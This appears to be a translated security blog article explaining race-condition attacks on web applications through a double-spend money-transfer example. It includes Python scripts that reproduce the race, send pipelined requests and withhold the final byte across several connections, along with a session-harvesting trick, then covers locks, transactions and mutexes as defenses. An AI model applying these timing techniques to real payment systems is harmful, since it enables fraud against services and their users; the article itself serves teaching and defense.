
Vasya wants to transfer the 100 dollars he has in his account to Petya. He goes to the transfers tab, enters Petya's nickname and, in the amount field, the number 100. Then he clicks the transfer button, and the data about whom to pay and how much is sent to the web application. What can happen inside? What does the programmer need to do for everything to work correctly?
- Make sure Vasya has enough money in his account
- Subtract the transfer amount from Vasya's balance
- Add the transfer amount to Petya's balance
- Show the user a message that he is well done!
Pseudocode
Code:
If (Vasya.balance >= transfer_amount) Then
    Vasya.balance = Vasya.balance - transfer_amount
    Petya.balance = Petya.balance + transfer_amount
    Congratulations()
Else
    Error()
Everything would be fine if everything happened strictly in order. But a site can serve many users at once, and this does not happen in a single thread: modern web applications use multiprocessing and multithreading to handle data in parallel. With the advent of multithreading, programs acquired an amusing architectural vulnerability: the race condition.
Now imagine that our algorithm runs three times simultaneously.
Vasya still has 100 points on his balance, only somehow he hit the web application in three threads at the same time (with a minimal interval between requests). All three threads check that the user Petya exists and that Vasya's balance is sufficient for the transfer. At the moment each thread checks the balance, it still equals 100. As soon as the check passes, 100 is subtracted from the current balance three times, and Petya is credited three times.
What do we have? Vasya has a negative balance on his account (100 - 300 = -200 points). Meanwhile, Petya has 300 points, when in fact he should have 100. This is a typical example of exploiting a race condition. It is comparable to several people walking through a turnstile on a single pass at once. Below is a screenshot of such a situation by @4lemon
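To make this concrete, here is a minimal sketch in Python that reproduces the same race with three threads; the account names, amounts, and the artificial delay are illustrative (the delay just widens the window between the check and the update, which in a real application is the gap between the SELECT and the UPDATE):
Code:
# Minimal sketch: three threads all pass the balance check before any of
# them subtracts, so Vasya goes negative and Petya gets 300 instead of 100.
import threading
import time

balances = {"vasya": 100, "petya": 0}

def transfer(src, dst, amount):
    if balances[src] >= amount:      # every thread passes this check...
        time.sleep(0.1)              # ...before any of them gets here
        balances[src] -= amount
        balances[dst] += amount

threads = [threading.Thread(target=transfer, args=("vasya", "petya", 100))
           for _ in range(3)]
for t in threads:
    t.start()
for t in threads:
    t.join()

print(balances)  # typically {'vasya': -200, 'petya': 300}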

Race conditions can exist both in multithreaded applications and in the databases they run on top of. And not only in web applications: for example, this is a common vector for privilege escalation in operating systems. Web applications, though, have their own peculiarities that affect successful exploitation, and those are what I want to talk about.
Typical race condition exploitation
QUOTE:
A hacker walks into a hookah lounge, an escape room, and a bar at the same time, and he is told: you have a race condition!
Omar Ganiev
What happens when the requests are sent
Each thread establishes a TCP connection, sends data, waits for a response, closes the connection, reopens it, sends data again, and so on. At first glance, all the data is sent at the same time, but the HTTP requests themselves may not arrive synchronously, due to the peculiarities of the transport layer, the need to establish a secure connection (HTTPS) and resolve DNS (not in the case of Burp), and the many layers of abstraction the data passes through before reaching the network device. When milliseconds are at stake, this can play a key role.
HTTP Pipelining
Recall HTTP pipelining, which lets you send several requests over a single socket. You can see for yourself how it works using the netcat utility (you do have GNU/Linux, right?).
In fact, Linux is worth using for many reasons, since its kernel carries a more modern TCP/IP stack. The target server is most likely running it too.
For example, run the command nc google.com 80 and paste these lines into it:
Code:
GET / HTTP/1.1
Host: google.com
GET / HTTP/1.1
Host: google.com
GET / HTTP/1.1
Host: google.com
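The same pipelining can be scripted. Here is a minimal sketch in Python, assuming the server keeps the connection alive long enough to answer all three pipelined requests:
Code:
# Minimal sketch of HTTP pipelining: three GET requests are written to one
# TCP socket before any response is read.
import socket

request = b"GET / HTTP/1.1\r\nHost: google.com\r\n\r\n"

sock = socket.create_connection(("google.com", 80))
sock.sendall(request * 3)        # all three requests leave as one stream

sock.settimeout(2)
response = b""
try:
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            break
        response += chunk
except socket.timeout:
    pass
sock.close()

print(response.count(b"HTTP/1.1 "))  # expect three status lines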
What's on the server
The web server will receive the requests sequentially (that is the key word) and will process them in that same order. This feature can be used for a multi-step attack (when two actions must be performed one after another within a minimal amount of time) or, for example, to slow the server down with the first request in order to increase the attack's chance of success.
A trick: you can hold up the processing of your requests by loading the DBMS, which is especially effective if INSERT/UPDATE is used. Heavier queries can "slow down" your payload, so there will be a higher probability that you win this race.
Splitting an HTTP Request into Two Parts
First, remember how an HTTP request is formed.
Well, as you know, the first line is the method, path, and protocol version:
GET / HTTP/1.1
Then come the headers, up to an empty line:
Host: google.com
Cookie: a=1
But how does the web server know that the HTTP request has ended?
Let's look at an example: run nc google.com 80 and type
Code:
GET / HTTP/1.1
Host: google.com
That is, two newlines are required for the web server to accept an HTTP request. And the correct request looks like this:
GET / HTTP/1.1\r\nHost: google.com\r\n\r\n
If it were a POST method (don't forget about Content-Length), a correct HTTP request would look like this:
Code:
POST / HTTP/1.1
Host: google.com
Content-Length: 3

a=1
POST / HTTP/1.1\r\nHost: google.com\r\nContent-Length: 3\r\n\r\na=1
Try to send a similar request from the command line:
echo -ne "GET / HTTP/1.1\r\nHost: google.com\r\n\r\n" | nc google.com 80
As a result, you will receive a response, since our HTTP request is complete. But if you remove the last \n character, you will get no response.
In fact, many web servers accept just \n as the line break, so it is important not to swap \r and \n, otherwise the tricks described below may not work.
What does this give us? You can open several connections to the resource simultaneously, send 99% of your HTTP request, and withhold the last byte. The server will wait until you send the final newline character.
Once it is clear that the bulk of the data has been sent, send the last byte (or several).
This is especially important for a large POST request, for example when a file needs to be uploaded. But it makes sense even for a small request, since delivering a few bytes is much faster than delivering kilobytes of data simultaneously.
Delay before sending the second part of the request
According to research by Vlad Roskov, it makes sense not only to split the request but also to insert a delay of several seconds between sending the main part of the data and the final part. That is because web servers begin parsing a request before they have received it in full.

What's on the server
For example, nginx, upon receiving HTTP request headers, starts parsing them and caches the incomplete request. When the last byte arrives, the web server takes the partially processed request and sends it straight to the application, which shortens request processing time and increases the attack's chance of success.
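Putting the two tricks together, here is a minimal sketch of the last-byte technique with the delay; the host, endpoint, and cookie below are hypothetical and only illustrate the idea:
Code:
# Minimal sketch: open several connections, send everything except the
# final byte, wait so the server pre-parses the requests, then release
# the tails back to back.
import socket
import time

HOST, PORT = "example.com", 80
request = (b"GET /transfer?to=petya&amount=100 HTTP/1.1\r\n"
           b"Host: example.com\r\n"
           b"Cookie: PHPSESSID=...\r\n"
           b"\r\n")

sockets = []
for _ in range(3):
    s = socket.create_connection((HOST, PORT))
    s.sendall(request[:-1])      # hold back the very last byte
    sockets.append(s)

time.sleep(2)                    # let the server parse the incomplete requests

for s in sockets:
    s.sendall(request[-1:])      # release the final bytes with minimal gaps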
How to deal with it
First of all, this is of course an architectural problem: if you design the web application correctly, such races can be avoided.
Usually, the following defenses against this attack are used:
- Use locks.
An operation blocks access to the locked object in the DBMS until it is unlocked; everyone else stands aside and waits. Locks must be handled carefully so that nothing superfluous gets blocked.
- Use transaction isolation.
Serializable transactions guarantee strictly sequential execution, although this may affect performance.
- Use mutexes (semaphores); a sketch follows this list.
Take some shared store (for example, etcd). When the function is called, a record with a key is created; if the record could not be created, it already exists, and the request is aborted. When the request finishes processing, the record is deleted.
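To make the idea concrete, here is a minimal sketch that fixes the threaded demo from the beginning of the article, with threading.Lock playing the role of the mutex. In a real web application, where workers are separate processes, you would rely on DBMS locks (such as SELECT ... FOR UPDATE) or an external store like etcd instead:
Code:
# Minimal sketch of the locking fix: the check and the update now happen
# atomically under a single mutex.
import threading
import time

balances = {"vasya": 100, "petya": 0}
balance_lock = threading.Lock()

def transfer(src, dst, amount):
    with balance_lock:           # check + update become one atomic step
        if balances[src] >= amount:
            time.sleep(0.1)      # the same artificial delay as before
            balances[src] -= amount
            balances[dst] += amount

threads = [threading.Thread(target=transfer, args=("vasya", "petya", 100))
           for _ in range(3)]
for t in threads:
    t.start()
for t in threads:
    t.join()

print(balances)  # now reliably {'vasya': 0, 'petya': 100}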
Session peculiarities under race conditions
One peculiarity of sessions is that the session mechanism itself can interfere with exploiting a race. For example, in PHP, after session_start() the session file is locked, and it is released only when the script finishes (unless session_write_close was called). If another script that uses the session is called at this moment, it will wait.
To get around this, you can use a simple trick: authenticate as many times as needed. If the web application allows multiple sessions for one user, we simply collect all the PHPSESSIDs and send each request with its own identifier.
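A minimal sketch of this trick, with a hypothetical login endpoint and credentials (requests is a third-party Python library):
Code:
# Minimal sketch: authenticate several times and collect one PHPSESSID per
# session, so each racing request carries its own, unlocked session file.
import requests

LOGIN_URL = "https://example.com/login"   # hypothetical
CREDS = {"user": "vasya", "password": "..."}

session_ids = []
for _ in range(3):
    r = requests.post(LOGIN_URL, data=CREDS)
    session_ids.append(r.cookies.get("PHPSESSID"))

print(session_ids)  # three independent session identifiers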
Proximity to the server
If the site on which you want to exploit the race condition is hosted on AWS, rent a box on AWS. If it is on DigitalOcean, rent one there.
When it comes to sending requests and minimizing the sending gap between them, close proximity to the web server is definitely a plus.
After all, it matters whether the ping to the server is 200 ms or 10 ms. And if you are lucky, you may even land on the same physical server, which will make racing a little easier.
To pull off a race condition successfully, various tricks can be applied to increase the probability of success: send multiple requests over one connection (keep-alive), slowing the web server down; split the request into several parts and add a delay before sending the last one; reduce the distance to the server and the number of abstraction layers down to the network interface.
As a result of this analysis, Michail Badin and I developed the RacePWN tool. It consists of two components:
- The librace library, written in C, which sends many HTTP requests to the server in the minimum time, using most of the tricks from this article
- The racepwn utility, which takes a JSON configuration as input and generally drives that library
But in fact there is still room to grow: one can recall HTTP/2 and its prospects for this attack. For now, though, most HTTP/2 resources only have an HTTP/2 frontend that proxies requests to the good old HTTP/1.1.
Maybe you know some other subtleties?